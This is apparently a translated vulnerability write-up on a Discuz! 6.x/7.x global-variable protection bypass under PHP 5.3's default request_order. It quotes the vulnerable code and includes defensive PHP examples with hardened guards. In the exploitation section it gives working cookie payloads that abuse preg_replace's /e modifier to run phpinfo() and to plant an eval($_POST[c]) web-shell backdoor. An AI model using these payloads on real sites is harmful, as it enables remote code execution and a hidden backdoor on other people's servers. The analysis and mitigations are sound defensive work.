Discuz! 6.x/7.x global variable protection bypass causes command execution

Source: Internet
Author: User

Vulnerability Overview:

In PHP 5.3.x the default value of request_order in php.ini is GP, which leads to a global variable protection bypass in Discuz! 6.x/7.x.

Vulnerability Analysis: include/global.func.php contains this code:

    // Emulates register_globals: every key in $_COOKIE, $_POST and $_GET
    // becomes a global variable of the same name (escaped by daddslashes()).
    foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
        foreach($$_request as $_key => $_value) {
            // Keys starting with '_' are skipped; the name 'GLOBALS' is not.
            $_key{0} != '_' && $$_key = daddslashes($_value);
        }
    }

This code emulates register_globals. When magic_quotes_gpc is off, daddslashes() is called to escape each value before it becomes a global variable. That escaping does not apply when a script reads $_GET/$_POST/$_COOKIE directly, but the Discuz! source rarely reads those arrays directly, so few vulnerabilities come from that :(

However, there are other bypass methods. With register_globals = on, submitting a GLOBALS variable bypasses the code above. To prevent this, Discuz! has the following check:

    // Refuse any request that tries to inject a GLOBALS variable
    if (isset($_REQUEST['GLOBALS']) OR isset($_FILES['GLOBALS'])) {
        exit('Request tainting attempted.');
    }

So we can't submit the GLOBALS variable?

The contents of the $_REQUEST superglobal are governed by the request_order setting in php.ini. In the latest PHP 5.3.x series the default value of request_order is GP, so by default $_REQUEST contains only $_GET and $_POST, not $_COOKIE. The check above therefore never sees a GLOBALS variable submitted through a COOKIE :)
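The following is an added example, not Discuz! code, that models what request_order puts into $_REQUEST and why a guard that inspects only $_REQUEST misses a key carried in the Cookie header. The function names (buildRequest, requestOnlyGuard, allSourcesGuard) and the hardened guard itself are assumptions of this example, not the vendor's patch; the input arrays are constructed and stand for the already-parsed $_GET/$_POST/$_COOKIE/$_FILES.

```php
<?php
// Added example, not Discuz! code. All inputs below are constructed.

// Build the equivalent of $_REQUEST for a request_order string such as
// "GP", "GPC" or "EGPCS"; a later letter overwrites an earlier one, as PHP
// does. (An empty request_order, which makes PHP fall back to
// variables_order, is not modelled here.)
function buildRequest($order, array $get, array $post, array $cookie) {
    $sources = array('G' => $get, 'P' => $post, 'C' => $cookie);
    $request = array();
    foreach (str_split(strtoupper($order)) as $letter) {
        if (isset($sources[$letter])) {
            $request = array_merge($request, $sources[$letter]);
        }
    }
    return $request;
}

// The guard as the article quotes it: only $_REQUEST and $_FILES are inspected.
function requestOnlyGuard(array $request, array $files) {
    return isset($request['GLOBALS']) || isset($files['GLOBALS']);
}

// Hardened guard (an assumption of this example): inspect every input source
// directly, so php.ini cannot hide a key, and refuse any key that names a
// superglobal, since the register_globals emulation would otherwise turn it
// into a global variable.
function allSourcesGuard(array $get, array $post, array $cookie, array $files) {
    $banned = array('GLOBALS', '_GET', '_POST', '_COOKIE', '_REQUEST',
                    '_FILES', '_SERVER', '_ENV', '_SESSION');
    foreach (array($get, $post, $cookie, $files) as $source) {
        foreach ($banned as $name) {
            if (array_key_exists($name, $source)) {
                return true;
            }
        }
    }
    return false;
}

// Constructed request: a GLOBALS key arrives only in the cookie jar.
$get    = array('tid' => '1');
$post   = array();
$cookie = array('GLOBALS' => array('anything' => 'x'));
$files  = array();

// With request_order = GP the cookie never reaches $_REQUEST, so the quoted
// guard stays quiet; with GPC it fires.
$firesUnderGP  = requestOnlyGuard(buildRequest('GP',  $get, $post, $cookie), $files);
$firesUnderGPC = requestOnlyGuard(buildRequest('GPC', $get, $post, $cookie), $files);

// The hardened guard fires in both cases because it never consults $_REQUEST.
$firesAlways = allSourcesGuard($get, $post, $cookie, $files);

var_dump($firesUnderGP, $firesUnderGPC, $firesAlways);
```

Run it with php on the command line. The point of the hardened guard is that it does not depend on a php.ini value the application does not control: any check written against $_REQUEST inherits whatever request_order the host chose.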

Vulnerability Exploitation
include/discuzcode.func.php:

    function discuzcode($message, $smileyoff, $bbcodeoff, $htmlon = 0, $allowsmilies = 1, $allowbbcode = 1, $allowimgcode = 1, $allowhtml = 0, $jammer = 0, $parsetype = '0', $authorid = '0', $allowmediacode = '0', $pid = 0) {
        global $discuzcodes, $credits, $tid, $discuz_uid, $highlight, $maxsmilies, $db, $tablepre, $hideattach, $allowattachurl;

        if($parsetype != 1 && !$bbcodeoff && $allowbbcode && (strpos($message, '[/code]') || strpos($message, '[/CODE]')) !== FALSE) {
            $message = preg_replace("/\s?\[code\](.+?)\[\/code\]\s?/ies", "codedisp('\\1')", $message);
        }

        $msglower = strtolower($message);
        //$htmlon = $htmlon && $allowhtml ? 1 : 0;

        if(!$htmlon) {
            $message = $jammer ? preg_replace("/\r\n|\n|\r/e", "jammer()", dhtmlspecialchars($message)) : dhtmlspecialchars($message);
        }

        // Smiley replacement: both the pattern array and the replacement array
        // are read from $GLOBALS['_DCACHE'].
        if(!$smileyoff && $allowsmilies && !empty($GLOBALS['_DCACHE']['smilies']) && is_array($GLOBALS['_DCACHE']['smilies'])) {
            if(!$discuzcodes['smiliesreplaced']) {
                foreach($GLOBALS['_DCACHE']['smilies']['replacearray'] AS $key => $smiley) {
                    $GLOBALS['_DCACHE']['smilies']['replacearray'][$key] = '';
                }
                $discuzcodes['smiliesreplaced'] = 1;
            }
            $message = preg_replace($GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['_DCACHE']['smilies']['replacearray'], $message, $maxsmilies);
        }
        // ... (rest of the function omitted)


Note this line:

    $message = preg_replace($GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['_DCACHE']['smilies']['replacearray'], $message, $maxsmilies);

Both the search patterns and the replacements are taken from $GLOBALS['_DCACHE'], and a GLOBALS variable submitted through the cookie overrides that array.

Send the following in the request cookie:

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui together with GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
This runs phpinfo().
GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui together with GLOBALS[_DCACHE][smilies][replacearray]=eval($_POST[c])%3B
That is, a Trojan.
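The sink the article singles out is preg_replace() with a pattern array read from $GLOBALS['_DCACHE']: under PHP 5 a pattern whose modifiers include "e" makes preg_replace() eval() the replacement string. The following is an added example, not Discuz! code, of a guard placed in front of that sink; the function names (patternModifiers, hasEvalModifier, safeSmileyReplace) are assumptions of this example, and the cache entries are constructed. PHP 7.0 removed the "e" modifier altogether (preg_replace() then warns and returns NULL), which the guard also treats as a failure.

```php
<?php
// Added example, not Discuz! code. The cache entries below are constructed.

// Return the modifier string of a PCRE pattern, or null if the pattern is
// not well-formed enough to tell. Only single-character, non-bracket
// delimiters are handled, which is the form the smiley cache uses.
function patternModifiers($pattern) {
    $pattern = ltrim($pattern);
    if ($pattern === '') {
        return null;
    }
    $delim = $pattern[0];
    if (ctype_alnum($delim) || $delim === '\\') {
        return null; // not a legal PCRE delimiter
    }
    $close = strrpos($pattern, $delim, 1);
    if ($close === false) {
        return null; // no closing delimiter
    }
    return substr($pattern, $close + 1);
}

// A pattern is unsafe if it cannot be parsed or if "e" is among its modifiers.
function hasEvalModifier($pattern) {
    $mods = patternModifiers($pattern);
    return $mods === null || strpos($mods, 'e') !== false;
}

// Replace smilies only when every search pattern is a string free of the
// "e" modifier; otherwise return the message untouched and report which
// entry was rejected. A NULL from preg_replace() is reported as a failure too.
function safeSmileyReplace($message, array $search, array $replace, $limit = -1) {
    foreach ($search as $i => $pattern) {
        if (!is_string($pattern) || hasEvalModifier($pattern)) {
            return array('ok' => false, 'rejected' => $i, 'message' => $message);
        }
    }
    $out = preg_replace($search, $replace, $message, $limit);
    if ($out === null) {
        return array('ok' => false, 'rejected' => null, 'message' => $message);
    }
    return array('ok' => true, 'rejected' => null, 'message' => $out);
}

// Constructed cache entries of the shape Discuz! stores: pattern => literal HTML.
$search  = array('/:\)/', '/:\(/');
$replace = array('<img src="smile.gif">', '<img src="sad.gif">');
$r = safeSmileyReplace('hi :) bye :(', $search, $replace);
echo $r['message'], "\n";

// A tainted entry carrying the "e" modifier (the pattern quoted in the
// article) is refused before preg_replace() ever runs.
$r = safeSmileyReplace('hi :)', array('/.*/eui'), array('anything'));
var_dump($r['ok'], $r['rejected']);
```

The guard is a second line of defence only: the root cause is that request data can overwrite $GLOBALS['_DCACHE'] at all, so the input-side check from the previous section is the fix that matters, and this one limits the damage if a cache array is ever writable by another path.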

After that, the vulnerability is hidden and not easily discovered.

Conditions for exploitation:

1. Discuz! 6.x/7.x

2. request_order is at its default value, GP.

